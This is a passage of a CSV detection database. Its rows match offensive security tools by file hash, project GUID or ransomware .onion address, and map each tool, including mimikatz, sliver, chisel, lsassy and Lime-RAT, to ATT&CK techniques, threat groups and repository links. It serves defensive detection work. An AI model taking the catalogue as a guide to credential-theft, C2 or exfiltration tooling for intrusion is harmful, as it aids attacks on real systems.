TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25875" "*47c9eff8142490a2c341701aab7aaebc355eed1540eed534a8317dd1e65614b2*",".{0,1000}47c9eff8142490a2c341701aab7aaebc355eed1540eed534a8317dd1e65614b2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25876" "*47d121087c05568fe90a25ef921f9e35d40bc6bec969e33e75337fc9b580f0e8*",".{0,1000}47d121087c05568fe90a25ef921f9e35d40bc6bec969e33e75337fc9b580f0e8.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","25877" "*47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d*",".{0,1000}47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25879" "*47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d*",".{0,1000}47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25880" "*47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d*",".{0,1000}47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25881" 
"*47eb5cfc14028872dab22f2202be7f5df00288463ca798191286ddb99bf7b34f*",".{0,1000}47eb5cfc14028872dab22f2202be7f5df00288463ca798191286ddb99bf7b34f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25886" "*47f24f8e55ef98aca7f72bebb5867e8935f17fc7b1d5af8d6a76934009c27635*",".{0,1000}47f24f8e55ef98aca7f72bebb5867e8935f17fc7b1d5af8d6a76934009c27635.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25888" "*47f65f47bf82b419bd5cc4ef4dc6d538cad4e5006aad4c557d242e31ab492ba4*",".{0,1000}47f65f47bf82b419bd5cc4ef4dc6d538cad4e5006aad4c557d242e31ab492ba4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25889" 
"*47fa63cb5af6b062d101ab4a8d9885c089c3ab238fc5e9e11a26680f45e5250a*",".{0,1000}47fa63cb5af6b062d101ab4a8d9885c089c3ab238fc5e9e11a26680f45e5250a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25890" "*47fcecd53c11bc648d564c02592617a6ce400d59c94167eefc9a5f7d86cb645c*",".{0,1000}47fcecd53c11bc648d564c02592617a6ce400d59c94167eefc9a5f7d86cb645c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25891" "*47h4pwve4scndaneljfnxdhzoulgsyfzbgayyonbwztfz74gsdprz5qd.onion*",".{0,1000}47h4pwve4scndaneljfnxdhzoulgsyfzbgayyonbwztfz74gsdprz5qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25893" "*4802db51ec51c17bea27c97d871a840211f6d74b88eb9494b00b99a28957142a*",".{0,1000}4802db51ec51c17bea27c97d871a840211f6d74b88eb9494b00b99a28957142a.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 
- APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25894" "*48039def2e245f13ff409707a8b0018a402c58ec413ff81f947339203a615057*",".{0,1000}48039def2e245f13ff409707a8b0018a402c58ec413ff81f947339203a615057.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#filehash","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","25895" "*4808ad1202bb14375f19929cb389433ffca4b27eaba4490da262a48f57b5af64*",".{0,1000}4808ad1202bb14375f19929cb389433ffca4b27eaba4490da262a48f57b5af64.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","25896" 
"*4810c782a8fe964512f08db91e8107e9af29edab*",".{0,1000}4810c782a8fe964512f08db91e8107e9af29edab.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","25898" "*481dd18cb726fa8637461072ba5149f553ba72ff68bc0b28d98bc3bee0c5488d*",".{0,1000}481dd18cb726fa8637461072ba5149f553ba72ff68bc0b28d98bc3bee0c5488d.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","25901" "*482002c785db1a3432ec214464a19042a3f36a21e5617a9901a0eae9f04451f1*",".{0,1000}482002c785db1a3432ec214464a19042a3f36a21e5617a9901a0eae9f04451f1.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","#filehash","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","25903" "*48213dd6196f88e665f7ca5d9e139f56f9c54921ae9703a329f76b08ec364d3d*",".{0,1000}48213dd6196f88e665f7ca5d9e139f56f9c54921ae9703a329f76b08ec364d3d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - 
T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25904" "*48213dd6196f88e665f7ca5d9e139f56f9c54921ae9703a329f76b08ec364d3d*",".{0,1000}48213dd6196f88e665f7ca5d9e139f56f9c54921ae9703a329f76b08ec364d3d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - 
Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25905" "*482882bd61c051edd33a9b31d03430d6090bcf031102779c66c7adfc1790d7ee*",".{0,1000}482882bd61c051edd33a9b31d03430d6090bcf031102779c66c7adfc1790d7ee.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25907" "*4830297df839add17bdea8daa07deea8a8b1ff156a68dfeae1e7ae420270191f*",".{0,1000}4830297df839add17bdea8daa07deea8a8b1ff156a68dfeae1e7ae420270191f.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","25910" "*48305b78df432d4e3b15a32a516fab118add29b2c12a49806745ea92f2a98b1b*",".{0,1000}48305b78df432d4e3b15a32a516fab118add29b2c12a49806745ea92f2a98b1b.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","25911" "*48356997a701c96f9b96b1d2dfc20280771a112f2d03b0266abb12e24562456c*",".{0,1000}48356997a701c96f9b96b1d2dfc20280771a112f2d03b0266abb12e24562456c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25912" "*48359bfb6692ea45f075188b2b244fc8fcec4ef7e80d2c2eecae90d5c9cdd04b*",".{0,1000}48359bfb6692ea45f075188b2b244fc8fcec4ef7e80d2c2eecae90d5c9cdd04b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25913" "*4841539dd633e3c38767c9098481406113d80aba6c23e5326f30e5328ac30234*",".{0,1000}4841539dd633e3c38767c9098481406113d80aba6c23e5326f30e5328ac30234.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","25914" 
"*484703070e9da920db68980b7278e8cbafdfd69e3019772253f70e4d425d0a35*",".{0,1000}484703070e9da920db68980b7278e8cbafdfd69e3019772253f70e4d425d0a35.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25915" "*4848f468fc1f6b5c933d83be4e9295cf6af8eb74b789fdf0a6f116c7444808b2*",".{0,1000}4848f468fc1f6b5c933d83be4e9295cf6af8eb74b789fdf0a6f116c7444808b2.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","#filehash","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","25916" "*484e5f88fb6e76e88b542f032e1ff0b693e16f67ca9810cbc4de4d1314f4420d*",".{0,1000}484e5f88fb6e76e88b542f032e1ff0b693e16f67ca9810cbc4de4d1314f4420d.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","25918" "*484f12b93ca5f088c3a0db9f31106c2fc855642292fc867a512df8f6a8826d09*",".{0,1000}484f12b93ca5f088c3a0db9f31106c2fc855642292fc867a512df8f6a8826d09.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 
- T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#filehash","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","25919" "*485fc17f62c8fddffc7e65f7dac7675eb02912abc6930260caa3b3aa9613b3d0*",".{0,1000}485fc17f62c8fddffc7e65f7dac7675eb02912abc6930260caa3b3aa9613b3d0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25921" "*4860280fe3039b1f65dad29dbcbb674c6f41004c34e99d382b824b4004aacdd0*",".{0,1000}4860280fe3039b1f65dad29dbcbb674c6f41004c34e99d382b824b4004aacdd0.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","25922" "*486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8*",".{0,1000}486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","#filehash","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","25924" "*4870b4163315fa666dea8be03176d76aa215fe33187db45aca984e07b25ca827*",".{0,1000}4870b4163315fa666dea8be03176d76aa215fe33187db45aca984e07b25ca827.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data 
Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","#filehash","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","25925" "*48736ecb605040b194fb7064d4bb621c38713fd3555a4f09f759ee45e81a2103*",".{0,1000}48736ecb605040b194fb7064d4bb621c38713fd3555a4f09f759ee45e81a2103.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25926" "*4876fe3093df0f61892c691ecdf0db052d77c461fac698b50d1fd48e927bd2e9*",".{0,1000}4876fe3093df0f61892c691ecdf0db052d77c461fac698b50d1fd48e927bd2e9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25929" "*487B9D03-F5C6-45D5-A159-3148F98B5179*",".{0,1000}487B9D03\-F5C6\-45D5\-A159\-3148F98B5179.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","25931" "*487E2246-72F1-4BD3-AA8A-A9B8C79C9F28*",".{0,1000}487E2246\-72F1\-4BD3\-AA8A\-A9B8C79C9F28.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25932" "*488785c691425b7cb3c355b1ae38a0527faf339f68a3536f34e1ee10c627790c*",".{0,1000}488785c691425b7cb3c355b1ae38a0527faf339f68a3536f34e1ee10c627790c.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","25933" "*4889b9e1fa6c34ea86e56253135093b390919aa006f8cd3fa372b410f2f1e5bf*",".{0,1000}4889b9e1fa6c34ea86e56253135093b390919aa006f8cd3fa372b410f2f1e5bf.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - 
TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","#filehash","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","25934" "*48a1d2dcff404b6c3b2ab326d85789a29590a1efefe9a1bc2f5b973c39b9ad46*",".{0,1000}48a1d2dcff404b6c3b2ab326d85789a29590a1efefe9a1bc2f5b973c39b9ad46.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25936" "*48a2b0cc57d547c472ef3f49eaf6ebac2db4dea9f59f522a21cd213bea4da5f7*",".{0,1000}48a2b0cc57d547c472ef3f49eaf6ebac2db4dea9f59f522a21cd213bea4da5f7.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","25937" "*48a5568360a31333aa809cc28c5a5669a028d32a6ea4b1037813745c5ceffbcc*",".{0,1000}48a5568360a31333aa809cc28c5a5669a028d32a6ea4b1037813745c5ceffbcc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25940" 
